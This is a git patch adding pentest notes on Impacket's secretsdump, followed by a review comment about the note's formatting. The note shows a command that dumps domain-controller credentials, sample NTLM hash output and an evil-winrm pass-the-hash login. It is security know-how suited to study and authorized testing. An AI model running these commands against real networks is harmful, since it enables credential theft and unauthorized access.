From 04cdaf34ca422cf45a9a157ef4bb31d50f40e659 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 28 Aug 2021 00:13:16 +0200 Subject: [PATCH] bump --- post_exploitation/docs/secretsdump.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 post_exploitation/docs/secretsdump.md diff --git a/post_exploitation/docs/secretsdump.md b/post_exploitation/docs/secretsdump.md new file mode 100644 index 0000000..11f2038 --- /dev/null +++ b/post_exploitation/docs/secretsdump.md @@ -0,0 +1,23 @@ +# Secretsdump + +Mimikatz for the network! +* Part of Impacket + +## Usage +* IP and domain controller name only. +```sh +secretsdump.py -just-dc -no-pass \$@ +``` + +* Dumped domain credentials are the result. Example: +```sh +Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2179ebfa86eb0e3cbab2bd58f2c946f5::: +``` + +* NTLM hashes of this dump can be used to feed `evil-winrm`. Example from above as Administrator + Hash +```sh +evil-winrm.rb -i 10.10.15.3 -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 +``` +
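Review bot: in the first Usage block, `secretsdump.py -just-dc -no-pass \$@` keeps its backslash when rendered inside a fenced block, so readers will see `\$@` literally. The line also never shows where the "IP and domain controller name" from the bullet above it actually go. Replace `\$@` with a named target placeholder and say in one sentence what it stands for. The second fenced block is tool output rather than a command, so tag it as plain text instead of `sh`. Add a line describing the colon-separated fields; the only hint that "NTLM hash" means the fourth field is that the evil-winrm example reuses `3f3ef89114fb063e3d7fc23c20f65568` from the Administrator row. Label the hashes and `10.10.15.3` as sample lab values so they are not mistaken for live data. The subject line `bump` does not describe a commit that creates a new file; something like "add secretsdump notes" would make the history searchable.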